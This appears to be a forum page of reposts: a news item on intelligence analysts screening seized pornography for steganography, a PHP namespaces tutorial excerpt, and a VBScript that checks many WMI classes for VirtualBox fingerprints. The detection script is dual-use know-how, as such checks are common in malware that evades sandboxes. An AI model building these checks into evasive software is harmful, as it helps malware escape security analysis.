There's been a lot of concern about how intelligence agencies around the world have been covertly snooping on private emails, instant message communications and phone calls, but here's something you may not have realised. They also get to watch a lot of porn.

The Daily Beast has the scoop, explaining that CIA and NSA analysts are tasked with examining graphic content that may have been recovered from computers and smartphones during the pursuit of alleged terrorists. Much of this content is retrieved by the NSA's controversial Tailored Access Operations (TAO) group, which is said to have infected 50,000 systems around the world with malware and even intercepted Microsoft Windows crash error reports.

In addition, according to the report, the examined content (which can contain disturbing snuff movies and child abuse images, as well as conventional pornography) is scooped up from "websites frequented by jihadists" and "in some cases" viewed in real-time as it is posted by people of interest.

The NSA has reportedly provided its own private viewing room for those employed to watch porn.

    And it's not all beheading videos. Yes, these snuff films have become vital sources of clues for U.S. intelligence analysts. But the vast majority of material these analysts are studying, according to current and former intelligence officials, is a very different sort of NSFW fare.

    "It's mostly porn," a former intelligence officer who worked on counterterrorism operations told The Daily Beast. At the headquarters of the NSA in Ft. Meade, Md., another former intelligence officer said, there is a closed room set aside for watching porno clips.

One of the reasons that intelligence agencies are checking out the porn videos of terrorists is, apparently, because they are very aware that groups could hide messages within them using steganography.

Steganography is the technique of hiding a message within a digital graphic image - making it something that you won't be able to spot with the naked eye. By disguising a message in this way your hope is that anyone intercepting the communication won't realise its true purpose, meaning it remains a secret until the recipient at the other end runs a program to extract the hidden message.

It isn't entirely fanciful to imagine that terrorists might hide secret messages inside porn movies. In 2011, for instance, German police arrested a suspected al-Qaeda member carrying a memory card. When the memory card was examined, Ars Technica reported in 2012, it was discovered to contain a password-protected folder that (when it eventually revealed its secrets) contained a pornographic video called "KickAss". Later it was determined that the "KickAss" porn flick contained its own secrets, disguised through steganography:

    Within that video, they discovered 141 separate text files, containing what officials claim are documents detailing al-Qaeda operations and plans for future operations—among them, three entitled "Future Works," "Lessons Learned," and "Report on Operations."

Of course, simply watching a blue movie shouldn't be an effective way to tell if it contains data hidden through steganography, if the terrorist is doing their job properly. But I guess the agency would be considered remiss if they didn't have someone tasked with the onerous job of reading every document, checking every image, and watching every minute of video that has been seized.

Although the porn angle is likely to generate some sniggers from the back of the class, it actually sounds like a ghastly job, with the potential for people to be negatively impacted by some of the more harrowing content they must end up viewing.

As such, regardless of whether you approve of some of the methods used by the NSA's TAO unit, it's good to hear that mental health professionals and counsellors are available to workers who may be disturbed by the content they are paid to view.

Side note: This isn't, of course, the first time that intelligence agencies have shown a lot of interest in watching movies of people without their clothes on. The UK's GCHQ spied on more than 1.8 million Yahoo users around the world for six months back in 2008 as part of "Operation Optic Nerve", in a gross invasion of privacy. According to one GCHQ document, between 3 and 11 percent of collected Yahoo webcam images contained sexually explicit content.

Which makes me think, there must have been some poor sod whose job it was to count every time someone got nude on their Yahoo webcam chat. That's a pretty awful job too.

Sursa: https://grahamcluley.com/2015/04/nsa-porn/
  20. VirtualBox Detection Via WQL Queries

Here I have tried to group most of the WMI classes that can be used to detect a VirtualBox virtual machine. They are as follows:

1) Win32_NetworkAdapterConfiguration (Alias: NICCONFIG)
2) Win32_SystemDriver (Alias: sysdriver)
3) Win32_NTEventLog (Alias: NTEventLog)
4) Win32_BIOS (Alias: bios)
5) Win32_DiskDrive (Alias: diskdrive)
6) Win32_StartupCommand (Alias: Startup)
7) Win32_ComputerSystem (Alias: ComputerSystem)
8) Win32_Service (Alias: service)
9) Win32_LogicalDisk (Alias: LogicalDisk)
10) Win32_LocalProgramGroup
11) Win32_NetworkAdapter (Alias: NIC)
12) Win32_Process (Alias: process)
13) Win32_BaseBoard (Alias: BaseBoard)
14) Win32_SystemEnclosure (Alias: SystemEnclosure)
15) Win32_CDROMDrive (Alias: cdrom)
16) WIN32_NetworkClient (Alias: netclient)
17) Win32_ComputerSystemProduct (Alias: csproduct)
18) Win32_VideoController
19) Win32_PnPEntity

I wrote some simple VBScript code for these WQL queries. Here you can find it. It is very self-explanatory.

Posted by Walied Assar

' https://twitter.com/waleedassar
' http://waliedassar.com/
' Simple WMI WQL queries for detecting VirtualBox VM's
VBoxFound = False
set objX = GetObject("winmgmts:\\.\root\cimv2")

' Win32_NetworkAdapterConfiguration aka NICCONFIG
Set NicQ = objX.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration")
For Each Nic in NicQ
    if Not IsNull(Nic.MACAddress) And Not IsNull(Nic.Description) Then
        MacAddress = LCase(CStr(Nic.MACAddress))
        Description = LCase(CStr(Nic.Description))
        'We want to detect the VirtualBox guest, not the host
        If InStr(1,MacAddress,"08:00:27:") = 1 And InStr(1,Description,"virtualbox") = 0 Then
            WScript.Echo "Win32_NetworkAdapterConfiguration ==> Nic.MACAddress: " & Nic.MACAddress
            VBoxFound = True
        End If
    End If
Next

'Win32_SystemDriver aka sysdriver
Set SysDrvQ = objX.ExecQuery("SELECT * FROM Win32_SystemDriver")
For Each SysDrv in SysDrvQ
    DescSysDrv = SysDrv.Description
    DispSysDrv = SysDrv.DisplayName
    NameSysDrv = SysDrv.Name
    PathSysDrv = SysDrv.PathName
    If Not IsNull(DescSysDrv) Then
        If DescSysDrv = "VirtualBox Guest Driver" Or DescSysDrv = "VirtualBox Guest Mouse Service" Or DescSysDrv = "VirtualBox Shared Folders" Or DescSysDrv = "VBoxVideo" Then
            WScript.Echo "Win32_SystemDriver ==> SysDrv.Description ==> " & DescSysDrv
            VBoxFound = True
        End If
    End If
    If Not IsNull(DispSysDrv) Then
        If DispSysDrv = "VirtualBox Guest Driver" Or DispSysDrv = "VirtualBox Guest Mouse Service" Or DispSysDrv = "VirtualBox Shared Folders" Or DispSysDrv = "VBoxVideo" Then
            WScript.Echo "Win32_SystemDriver ==> SysDrv.DisplayName ==> " & DispSysDrv
            VBoxFound = True
        End If
    End If
    If Not IsNull(NameSysDrv) Then
        If NameSysDrv = "VBoxGuest" Or NameSysDrv = "VBoxMouse" Or NameSysDrv = "VBoxSF" Or NameSysDrv = "VBoxVideo" Then
            WScript.Echo "Win32_SystemDriver ==> SysDrv.Name ==> " & NameSysDrv
            VBoxFound = True
        End If
    End If
    If Not IsNull(PathSysDrv) Then
        PathSysDrv_l = LCase(PathSysDrv)
        If InStr(1,PathSysDrv_l,"vboxguest.sys") > 0 Or InStr(1,PathSysDrv_l,"vboxmouse.sys") > 0 Or InStr(1,PathSysDrv_l,"vboxsf.sys") > 0 Or InStr(1,PathSysDrv_l,"vboxvideo.sys") > 0 Then
            WScript.Echo "Win32_SystemDriver ==> SysDrv.PathName ==> " & PathSysDrv
            VBoxFound = True
        End If
    End If
Next

' Win32_NTEventLog aka NTEventLog
Set EvtLogQ = objX.ExecQuery("SELECT * FROM Win32_NTEventlogFile")
For Each EvtLogX In EvtLogQ
    If Not IsNull(EvtLogX) Then
        FileNameEvtX = CStr(EvtLogX.FileName)
        FileNameEvtX_l = LCase(FileNameEvtX)
        If FileNameEvtX_l = "sysevent" Or FileNameEvtX_l = "system" Then
            SourcesEvtX = EvtLogX.Sources
            For Each SourceEvtX in SourcesEvtX
                SourceEvtX_l = LCase(CStr(SourceEvtX))
                If SourceEvtX_l = "vboxvideo" Then
                    WScript.Echo "Win32_NTEventlogFile ==> EvtLogX.Sources ==> " & SourceEvtX
                    VBoxFound = True
                End If
            Next
        End If
    End If
Next

' Win32_BIOS aka bios
Set BiosQ = objX.ExecQuery("SELECT * FROM Win32_BIOS")
For Each Bios in BiosQ
    If Not IsNull(Bios) Then
        If Not IsNull(Bios.Manufacturer) Then
            ManufacturerBios = LCase(CStr(Bios.Manufacturer))
            If InStr(1,ManufacturerBios,"innotek gmbh") > 0 Then
                WScript.Echo "Win32_BIOS ==> Bios.Manufacturer ==> " & Bios.Manufacturer
                VBoxFound = True
            End If
        End If
        If Not IsNull(Bios.SMBIOSBIOSVersion) Then
            SMBIOSBIOSVersionBios = LCase(CStr(Bios.SMBIOSBIOSVersion))
            If InStr(1,SMBIOSBIOSVersionBios,"virtualbox") > 0 Then
                WScript.Echo "Win32_BIOS ==> Bios.SMBIOSBIOSVersion ==> " & Bios.SMBIOSBIOSVersion
                VBoxFound = True
            End If
        End If
        If Not IsNull(Bios.Version) Then
            VersionBios = LCase(CStr(Bios.Version))
            If InStr(1,VersionBios,"vbox - 1") > 0 Then
                WScript.Echo "Win32_BIOS ==> Bios.Version ==> " & Bios.Version
                VBoxFound = True
            End If
        End If
    End If
Next

' Win32_DiskDrive aka diskdrive
Set DiskDriveQ = objX.ExecQuery("SELECT * FROM Win32_DiskDrive")
For Each DiskDrive in DiskDriveQ
    If Not IsNull(DiskDrive) Then
        If Not IsNull(DiskDrive.Model) Then
            ModelDskDrv = LCase(DiskDrive.Model)
            If ModelDskDrv = "vbox harddisk" Then
                WScript.Echo "Win32_DiskDrive ==> DiskDrive.Model ==> " & DiskDrive.Model
                VBoxFound = True
            End If
        End If
        If Not IsNull(DiskDrive.PNPDeviceID) Then
            PNPDeviceIDDskDrv = LCase(DiskDrive.PNPDeviceID)
            If InStr(1,PNPDeviceIDDskDrv,"diskvbox") > 0 Then
                WScript.Echo "Win32_DiskDrive ==> DiskDrive.PNPDeviceID ==> " & DiskDrive.PNPDeviceID
                VBoxFound = True
            End If
        End If
    End If
Next

' Win32_StartupCommand aka Startup
Set StartupQ = objX.ExecQuery("SELECT * FROM Win32_StartupCommand")
For Each Startup in StartupQ
    If Not IsNull(Startup) Then
        If Not IsNull(Startup.Caption) Then
            CaptionStartup = LCase(CStr(Startup.Caption))
            If CaptionStartup = "vboxtray" Then
                WScript.Echo "Win32_StartupCommand ==> Startup.Caption ==> " & Startup.Caption
                VBoxFound = True
            End If
        End If
        If Not IsNull(Startup.Command) Then
            CommandStartup = LCase(CStr(Startup.Command))
            If InStr(1,CommandStartup,"vboxtray.exe") > 0 Then
                WScript.Echo "Win32_StartupCommand ==> Startup.Command ==> " & Startup.Command
                VBoxFound = True
            End If
        End If
        If Not IsNull(Startup.Description) Then
            DescStartup = LCase(CStr(Startup.Description))
            If DescStartup = "vboxtray" Then
                WScript.Echo "Win32_StartupCommand ==> Startup.Description ==> " & Startup.Description
                VBoxFound = True
            End If
        End If
    End If
Next

'Win32_ComputerSystem aka ComputerSystem
Set ComputerSystemQ = objX.ExecQuery("SELECT * FROM Win32_ComputerSystem")
For Each ComputerSystem in ComputerSystemQ
    If Not IsNull(ComputerSystem) Then
        If Not IsNull(ComputerSystem.Manufacturer) Then
            ManufacturerComputerSystem = LCase(CStr(ComputerSystem.Manufacturer))
            If ManufacturerComputerSystem = "innotek gmbh" Then
                WScript.Echo "Win32_ComputerSystem ==> ComputerSystem.Manufacturer ==> " & ComputerSystem.Manufacturer
                VBoxFound = True
            End If
        End If
        If Not IsNull(ComputerSystem.Model) Then
            ModelComputerSystem = LCase(CStr(ComputerSystem.Model))
            If ModelComputerSystem = "virtualbox" Then
                WScript.Echo "Win32_ComputerSystem ==> ComputerSystem.Model ==> " & ComputerSystem.Model
                VBoxFound = True
            End If
        End If
        If Not IsNull(ComputerSystem.OEMStringArray) Then
            OEMStringArrayComputerSystem = ComputerSystem.OEMStringArray
            For Each OEM In OEMStringArrayComputerSystem
                OEM_l = LCase(OEM)
                If InStr(1,OEM_l,"vboxver_") > 0 Or InStr(1,OEM_l,"vboxrev_") > 0 Then
                    WScript.Echo "Win32_ComputerSystem ==> ComputerSystem.OEMStringArray ==> " & OEM
                    VBoxFound = True
                End If
            Next
        End If
    End If
Next

'Win32_Service aka service
Set ServiceQ = objX.ExecQuery("SELECT * FROM Win32_Service")
For Each Service in ServiceQ
    If Not IsNull(Service) Then
        If Not IsNull(Service.Caption) Then
            CaptionService = LCase(CStr(Service.Caption))
            If CaptionService = "virtualbox guest additions service" Then
                WScript.Echo "Win32_Service ==> Service.Caption ==> " & Service.Caption
                VBoxFound = True
            End If
        End If
        If Not IsNull(Service.DisplayName) Then
            DisplayNameService = LCase(CStr(Service.DisplayName))
            If DisplayNameService = "virtualbox guest additions service" Then
                WScript.Echo "Win32_Service ==> Service.DisplayName ==> " & Service.DisplayName
                VBoxFound = True
            End If
        End If
        If Not IsNull(Service.Name) Then
            NameService = LCase(CStr(Service.Name))
            If NameService = "vboxservice" Then
                WScript.Echo "Win32_Service ==> Service.Name ==> " & Service.Name
                VBoxFound = True
            End If
        End If
        If Not IsNull(Service.PathName) Then
            PathNameService = LCase(CStr(Service.PathName))
            If InStr(1,PathNameService,"vboxservice.exe") > 0 Then
                WScript.Echo "Win32_Service ==> Service.PathName ==> " & Service.PathName
                VBoxFound = True
            End If
        End If
    End If
Next

'Win32_LogicalDisk aka LogicalDisk
Set LogicalDiskQ = objX.ExecQuery("SELECT * FROM Win32_LogicalDisk")
For Each LogicalDisk in LogicalDiskQ
    If Not IsNull(LogicalDisk) Then
        If Not IsNull(LogicalDisk.DriveType) Then
            If LogicalDisk.DriveType = 3 Then
                If Not IsNull(LogicalDisk.VolumeSerialNumber) Then
                    VolumeSerialNumberLogicalDisk = LCase(LogicalDisk.VolumeSerialNumber)
                    If VolumeSerialNumberLogicalDisk = "fceae0a3" Then
                        WScript.Echo "Win32_LogicalDisk ==> LogicalDisk.VolumeSerialNumber ==> " & LogicalDisk.VolumeSerialNumber
                        VBoxFound = True
                    End If
                End If
            ElseIf LogicalDisk.DriveType = 5 Then
                If Not IsNull(LogicalDisk.VolumeName) Then
                    VolumeNameLogicalDisk = LCase(LogicalDisk.VolumeName)
                    'Volume name should be "VBOXADDITIONS_4."
                    If InStr(1,VolumeNameLogicalDisk,"vboxadditions") > 0 Then
                        WScript.Echo "Win32_LogicalDisk ==> LogicalDisk.VolumeName ==> " & LogicalDisk.VolumeName
                        VBoxFound = True
                    End If
                End If
            End If
        End If
    End If
Next

'Win32_LocalProgramGroup
Set LogicalProgramGroupQ = objX.ExecQuery("SELECT * FROM Win32_LogicalProgramGroup")
For Each LocalProgramGroup in LogicalProgramGroupQ
    If Not IsNull(LocalProgramGroup) Then
        NameLocalProgramGroup = LCase(LocalProgramGroup.Name)
        If InStr(1,NameLocalProgramGroup,"oracle vm virtualbox guest additions") > 0 Then
            WScript.Echo "Win32_LogicalProgramGroup ==> LocalProgramGroup.Name ==> " & LocalProgramGroup.Name
            VBoxFound = True
        End If
    End If
Next

'Win32_NetworkAdapter aka NIC
Set NicQQ = objX.ExecQuery("SELECT * FROM Win32_NetworkAdapter")
For Each NIC_x in NicQQ
    if Not IsNull(NIC_x.MACAddress) And Not IsNull(NIC_x.Description) Then
        MacAddress_x = LCase(CStr(NIC_x.MACAddress))
        Description_x = LCase(CStr(NIC_x.Description))
        'We want to detect the VirtualBox guest, not the host
        If InStr(1,MacAddress_x,"08:00:27:") = 1 And InStr(1,Description_x,"virtualbox") = 0 Then
            WScript.Echo "Wow: Win32_NetworkAdapter ==> NIC.MacAddress: " & NIC_x.MACAddress
            VBoxFound = True
        End If
    End If
Next

'Win32_Process aka process
Set ProcessQ = objX.ExecQuery("SELECT * FROM Win32_Process")
For Each Process in ProcessQ
    If Not IsNull(Process) Then
        If Not IsNull(Process.Description) Then
            DescProcess = LCase(Process.Description)
            If DescProcess = "vboxservice.exe" Or DescProcess = "vboxtray.exe" Then
                WScript.Echo "Win32_Process ==> Process.Description ==> " & Process.Description
                VBoxFound = True
            End If
        End If
        If Not IsNull(Process.Name) Then
            NameProcess = LCase(Process.Name)
            If NameProcess = "vboxservice.exe" Or NameProcess = "vboxtray.exe" Then
                WScript.Echo "Win32_Process ==> Process.Name ==> " & Process.Name
                VBoxFound = True
            End If
        End If
        If Not IsNull(Process.CommandLine) Then
            CmdProcess = LCase(Process.CommandLine)
            If InStr(1,CmdProcess,"vboxservice.exe") > 0 OR InStr(1,CmdProcess,"vboxtray.exe") > 0 Then
                WScript.Echo "Win32_Service ==> Process.CommandLine ==> " & Process.CommandLine
                VBoxFound = True
            End If
        End If
        If Not IsNull(Process.ExecutablePath) Then
            ExePathProcess = LCase(Process.ExecutablePath)
            If InStr(1,ExePathProcess,"vboxservice.exe") > 0 OR InStr(1,ExePathProcess,"vboxtray.exe") > 0 Then
                WScript.Echo "Win32_Service ==> Process.ExecutablePath ==> " & Process.ExecutablePath
                VBoxFound = True
            End If
        End If
    End If
Next

'Win32_BaseBoard aka BaseBoard
Set BaseBoardQ = objX.ExecQuery("SELECT * FROM Win32_BaseBoard")
For Each BaseBoard in BaseBoardQ
    If Not IsNull(BaseBoard) Then
        If Not IsNull(BaseBoard.Manufacturer) Then
            ManufacturerBaseBoard = LCase(BaseBoard.Manufacturer)
            If ManufacturerBaseBoard = "oracle corporation" Then
                WScript.Echo "Win32_BaseBoard ==> BaseBoard.Manufacturer ==> " & BaseBoard.Manufacturer
                VBoxFound = True
            End If
        End If
        If Not IsNull(BaseBoard.Product) Then
            ProductBaseBoard = LCase(BaseBoard.Product)
            If ProductBaseBoard = "virtualbox" Then
                WScript.Echo "Win32_BaseBoard ==> BaseBoard.Product ==> " & BaseBoard.Product
                VBoxFound = True
            End If
        End If
    End If
Next

'Win32_SystemEnclosure aka SystemEnclosure
Set SystemEnclosureQ = objX.ExecQuery("SELECT * FROM Win32_SystemEnclosure")
For Each SystemEnclosure in SystemEnclosureQ
    If Not IsNull(SystemEnclosure) Then
        If Not IsNull(SystemEnclosure.Manufacturer) Then
            ManufacturerSystemEnclosure = LCase(SystemEnclosure.Manufacturer)
            If ManufacturerSystemEnclosure = "oracle corporation" Then
                WScript.Echo "Win32_SystemEnclosure ==> SystemEnclosure.Manufacturer ==> " & SystemEnclosure.Manufacturer
                VBoxFound = True
            End If
        End If
    End If
Next

'Win32_CDROMDrive aka cdrom
Set CDRomQ = objX.ExecQuery("SELECT * FROM Win32_CDROMDrive")
For Each CDRom in CDRomQ
    If Not IsNull(CDRom) Then
        If Not IsNull(CDRom.Name) Then
            NameCDRom = LCase(CDRom.Name)
            If NameCDRom = "vbox cd-rom" Then
                WScript.Echo "Win32_CDROMDrive ==> CDRom.Name ==> " & CDRom.Name
                VBoxFound = True
            End If
        End If
        If Not IsNull(CDRom.VolumeName) Then
            VolumeNameCDRom = LCase(CDRom.VolumeName)
            'Volume name should be "VBOXADDITIONS_4."
            If InStr(1,VolumeNameCDRom,"vboxadditions") > 0 Then
                WScript.Echo "Win32_CDROMDrive ==> CDRom.VolumeName ==> " & CDRom.VolumeName
                VBoxFound = True
            End If
        End If
        If Not IsNull(CDRom.DeviceID) Then
            DeviceIDCDRom = LCase(CDRom.DeviceID)
            If InStr(1,DeviceIDCDRom,"cdromvbox") > 0 Then
                WScript.Echo "Win32_CDROMDrive ==> CDRom.DeviceID ==> " & CDRom.DeviceID
                VBoxFound = True
            End If
        End If
        If Not IsNull(CDRom.PNPDeviceID) Then
            PNPDeviceIDCDRom = LCase(CDRom.PNPDeviceID)
            If InStr(1,PNPDeviceIDCDRom,"cdromvbox") > 0 Then
                WScript.Echo "Win32_CDROMDrive ==> CDRom.PNPDeviceID ==> " & CDRom.PNPDeviceID
                VBoxFound = True
            End If
        End If
    End If
Next

'WIN32_NetworkClient aka netclient
Set NetClientQ = objX.ExecQuery("SELECT * FROM WIN32_NetworkClient")
For Each NetClient in NetClientQ
    If Not IsNull(NetClient) Then
        If Not IsNull(NetClient.Description) Then
            DescNetClient = LCase(NetClient.Description)
            If DescNetClient = "vboxsf" Then
                WScript.Echo "WIN32_NetworkClient ==> NetClient.Description ==> " & NetClient.Description
                VBoxFound = True
            End If
        End If
        If Not IsNull(NetClient.Manufacturer) Then
            ManufacturerNetClient = LCase(NetClient.Manufacturer)
            If ManufacturerNetClient = "oracle corporation" Then
                WScript.Echo "WIN32_NetworkClient ==> NetClient.Manufacturer ==> " & NetClient.Manufacturer
                VBoxFound = True
            End If
        End If
        If Not IsNull(NetClient.Name) Then
            NameNetClient = LCase(NetClient.Name)
            If NameNetClient = "virtualbox shared folders" Then
                WScript.Echo "WIN32_NetworkClient ==> NetClient.Name ==> " & NetClient.Name
                VBoxFound = True
            End If
        End If
    End If
Next

'Win32_ComputerSystemProduct aka csproduct
Set CSProductQ = objX.ExecQuery("SELECT * FROM Win32_ComputerSystemProduct")
For Each CSProduct in CSProductQ
    If Not IsNull(CSProduct) Then
        If Not IsNull(CSProduct.Name) Then
            NameCSProduct = LCase(CSProduct.Name)
            If NameCSProduct = "virtualbox" Then
                WScript.Echo "Win32_ComputerSystemProduct ==> CSProduct.Name ==> " & CSProduct.Name
                VBoxFound = True
            End If
        End If
        If Not IsNull(CSProduct.Vendor) Then
            VendorCSProduct = LCase(CSProduct.Vendor)
            If VendorCSProduct = "innotek gmbh" Then
                WScript.Echo "Win32_ComputerSystemProduct ==> CSProduct.Vendor ==> " & CSProduct.Vendor
                VBoxFound = True
            End If
        End If
    End If
Next

'Win32_VideoController
Set VideoControllerQ = objX.ExecQuery("SELECT * FROM Win32_VideoController")
For Each VideoController in VideoControllerQ
    If Not IsNull(VideoController) Then
        If Not IsNull(VideoController.Name) Then
            NameVideoController = LCase(VideoController.Name)
            If NameVideoController = "virtualbox graphics adapter" Then
                WScript.Echo "Win32_VideoController ==> VideoController.Name ==> " & VideoController.Name
                VBoxFound = True
            End If
        End If
        If Not IsNull(VideoController.Description) Then
            DescVideoController = LCase(VideoController.Description)
            If DescVideoController = "virtualbox graphics adapter" Then
                WScript.Echo "Win32_VideoController ==> VideoController.Description ==> " & VideoController.Description
                VBoxFound = True
            End If
        End If
        If Not IsNull(VideoController.Caption) Then
            CaptionVideoController = LCase(VideoController.Caption)
            If CaptionVideoController = "virtualbox graphics adapter" Then
                WScript.Echo "Win32_VideoController ==> VideoController.Caption ==> " & VideoController.Caption
                VBoxFound = True
            End If
        End If
        If Not IsNull(VideoController.VideoProcessor) Then
            VideoProcessorVideoController = LCase(VideoController.VideoProcessor)
            If VideoProcessorVideoController = "vbox" Then
                WScript.Echo "Win32_VideoController ==> VideoController.VideoProcessor ==> " & VideoController.VideoProcessor
                VBoxFound = True
            End If
        End If
        If Not IsNull(VideoController.InstalledDisplayDrivers) Then
            InstalledDisplayDriversVideoController = LCase(VideoController.InstalledDisplayDrivers)
            If InstalledDisplayDriversVideoController = "vboxdisp.sys" Then
                WScript.Echo "Win32_VideoController ==> VideoController.InstalledDisplayDrivers ==> " & VideoController.InstalledDisplayDrivers
                VBoxFound = True
            End If
        End If
        If Not IsNull(VideoController.InfSection) Then
            InfSectionVideoController = LCase(VideoController.InfSection)
            If InfSectionVideoController = "vboxvideo" Then
                WScript.Echo "Win32_VideoController ==> VideoController.InfSection ==> " & VideoController.InfSection
                VBoxFound = True
            End If
        End If
        If Not IsNull(VideoController.AdapterCompatibility) Then
            AdapterCompatibilityVideoController = LCase(VideoController.AdapterCompatibility)
            If AdapterCompatibilityVideoController = "oracle corporation" Then
                WScript.Echo "Win32_VideoController ==> VideoController.AdapterCompatibility ==> " & VideoController.AdapterCompatibility
                VBoxFound = True
            End If
        End If
    End If
Next

'Win32_PnPEntity
Set PnPEntityQ = objX.ExecQuery("SELECT * FROM Win32_PnPEntity")
For Each PnPEntity in PnPEntityQ
    If Not IsNull(PnPEntity) Then
        If Not IsNull(PnPEntity.Name) Then
            NamePnPEntity = LCase(PnPEntity.Name)
            If NamePnPEntity = "virtualbox device" Or NamePnPEntity = "vbox harddisk" Or NamePnPEntity = "vbox cd-rom" Or NamePnPEntity = "virtualbox graphics adapter" Then
                WScript.Echo "Win32_PnPEntity ==> PnPEntity.Name ==> " & PnPEntity.Name
                VBoxFound = True
            End If
        End If
        If Not IsNull(PnPEntity.Caption) Then
            CaptionPnPEntity = LCase(PnPEntity.Caption)
            If CaptionPnPEntity = "virtualbox device" Or CaptionPnPEntity = "vbox harddisk" Or CaptionPnPEntity = "vbox cd-rom" Or CaptionPnPEntity = "virtualbox graphics adapter" Then
                WScript.Echo "Win32_PnPEntity ==> PnPEntity.Caption ==> " & PnPEntity.Caption
                VBoxFound = True
            End If
        End If
        If Not IsNull(PnPEntity.Description) Then
            DescPnPEntity = LCase(PnPEntity.Description)
            If DescPnPEntity = "virtualbox device" Or DescPnPEntity = "virtualbox graphics adapter" Then
                WScript.Echo "Win32_PnPEntity ==> PnPEntity.Description ==> " & PnPEntity.Description
                VBoxFound = True
            End If
        End If
        'Had to remove .Manufacturer as it detects Host as well
        'If Not IsNull(PnPEntity.Manufacturer) Then
        '    ManuPnPEntity = LCase(PnPEntity.Manufacturer)
        '    If ManuPnPEntity = "oracle corporation" Then
        '        WScript.Echo "Win32_PnPEntity ==> PnPEntity.Manufacturer ==> " & PnPEntity.Manufacturer
        '        VBoxFound = True
        '    End If
        'End If
        If Not IsNull(PnPEntity.Service) Then
            SrvPnPEntity = LCase(PnPEntity.Service)
            If SrvPnPEntity = "vboxguest" Or SrvPnPEntity = "vboxvideo" Then
                WScript.Echo "Win32_PnPEntity ==> PnPEntity.Service ==> " & PnPEntity.Service
                VBoxFound = True
            End If
        End If
        If Not IsNull(PnPEntity.DeviceID) Then
            DeviceIDPnPEntity = LCase(PnPEntity.DeviceID)
            If InStr(1,DeviceIDPnPEntity,"diskvbox_") > 0 Or InStr(1,DeviceIDPnPEntity,"cdromvbox_") > 0 Then
                WScript.Echo "Win32_PnPEntity ==> PnPEntity.DeviceID ==> " & PnPEntity.DeviceID
                VBoxFound = True
            End If
        End If
        If Not IsNull(PnPEntity.PNPDeviceID) Then
            PNPDeviceIDPnPEntity = LCase(PnPEntity.PNPDeviceID)
            If InStr(1,PNPDeviceIDPnPEntity,"diskvbox_") > 0 Or InStr(1,PNPDeviceIDPnPEntity,"cdromvbox_") > 0 Then
                WScript.Echo "Win32_PnPEntity ==> PnPEntity.PNPDeviceID ==> " & PnPEntity.PNPDeviceID
                VBoxFound = True
            End If
        End If
    End If
Next

If VBoxFound = False Then
    WScript.Echo "VirtualBox Was Not Found"
End If

Sursa: waliedassar: VirtualBox Detection Via WQL Queries
  21. Nytro

    DMOZ editor

    I submitted RST.
  22. PHP renewed: The new face of PHP

    Discover the major new language features in PHP

    PHP has evolved significantly since its early days as a templating language. In the first installment of a four-part series on modern-day PHP programming, PHP expert Eli White examines some of the advancements in PHP 5.3 and higher. Get up to speed on namespaces, traits, closures, generators, and more.

    PHP is maintained and developed as an open source project, with hundreds, possibly thousands, of contributors actively working to evolve the language to meet the needs of modern web development. PHP continues to incorporate new programming ideas, and it borrows ideas from other programming languages, yet it maintains a high level of backward compatibility. These qualities have led PHP to its current prominence: the language helps to run 82 percent of the web and powers some of the biggest websites (such as Facebook). PHP is also the core technology behind content-management system (CMS) frameworks such as WordPress, Drupal, Magento, and Joomla! (which together power around 30 percent of the web).

    If you haven't looked at PHP in a long time (or even in the last couple of years), you might not recognize the language that it has become. This article, the first in a four-part series, introduces you to the latest features added in recent releases such as PHP 5.3, 5.4, and 5.5. Of course, PHP isn't changing in a vacuum, and new language features are only part of PHP's overall evolution. The ways in which PHP programmers assemble their development servers, manage their third-party libraries, and address web security are also changing. Subsequent installments in this series will look into those aspects of the evolving PHP ecosystem.

    "I don't think anybody steals anything; all of us borrow." B.B. King

    About this series

    Continuously evolving under the aegis of an active open source project, PHP now powers much of the web. PHP has undergone remarkable changes since its early days as a templating language. If you haven't used or evaluated PHP technology in many years, you'd barely recognize some current PHP projects. This series shows you the latest PHP features and how to use today's PHP to build modern, secure websites.

    Namespaces

    Namespaces are a programming feature designed to allow classes (and functions) within different libraries to have exactly the same names. Name conflicts became a major problem as PHP grew as a language and the reuse of code libraries became more prevalent. By segmenting each library into its own namespace, you can, with no bad consequences, install and use a third-party library that includes classes whose names happen to match your own.

    Before support for namespaces was built in, libraries solved this issue by prefixing all of their classes with a consistent phrase, such as Zend_ in the case of the Zend Framework. You could end up with esoteric class names such as Zend_Db_Table and need to type such prefixes repeatedly while coding. The problem came to a head when the (much needed) DateTime classes were added to the core of PHP in version 5.2. Suddenly, many open source libraries began breaking because they had created their own classes called DateTime to fill the gap.

    Namespaces are created via the namespace keyword and separated by a backslash (\). Listing 1 shows a simple example.

    Listing 1. Simple namespace usage

        <?php
        namespace zebra;

        class DateTime {
            public function __construct() {
                echo "Today!";
            }
        }

        function stripes() {
            echo "-=-=-=-=-=-=-=-";
        }

    In Listing 1, I define my own namespace, called zebra, and then define both a class and a function within it. Redefining the DateTime class in this case doesn't cause any issues or errors, because I make my own version of DateTime inside the namespace. Now I can use the namespace by referencing the full name with \ as a separator, as shown in Listing 2.

    Listing 2. Using a custom namespace

        <?php
        include 'listing1.php';

        // Use the stripes function I declared in my namespace:
        zebra\stripes();

        // Use my own DateTime class:
        $dt = new zebra\DateTime();

        // Now use the 'root' level DateTime class:
        $real = new \DateTime('tomorrow noon');
        echo $real->format(\DateTime::ATOM);

    On line 2 of Listing 2, I include the file (listing1.php) that starts with the namespace directive. Then I can reference my classes and functions by prefixing them with the zebra\ namespace. I can also still use the global-level classes, such as the original DateTime, by prepending the backslash to denote the global namespace.

    The technique in Listing 2 is handy, but there's a way to make the code simpler-looking: the new use keyword. This keyword states that you want direct access to a specific class from within that namespace, as shown in Listing 3.

    Listing 3. Including the namespace with use

        <?php
        include 'listing1.php';
        use zebra\DateTime;

        // Use our own DateTime class:
        $dt = new DateTime();

    You can also have the use keyword create aliases, so that you can rename any class to something else for the scope you are in. Listing 4 shows how to create an alias.

    Listing 4. Creating an alias

        <?php
        include 'listing1.php';
        use zebra\DateTime as ZDT;

        // Use our own DateTime class:
        $dt = new ZDT();

    You can do much more with namespaces than I've touched on here, including creating subnamespaces. Dig deeper in the official documentation.

    READ: Namespaces documentation on php.net

    Traits

    Object-oriented programming is traditionally based deeply on the concept of classes and objects that inherit from one another. You begin with an abstract concept and continually subclass with children as you get more specific about the details. If you need a consistent API between your objects, the concept of interfaces comes into play; there, you can define the methods that the object needs to implement. But what if you don't merely want to declare which methods must exist, but you also want to provide their implementations at the same time? Enter traits.

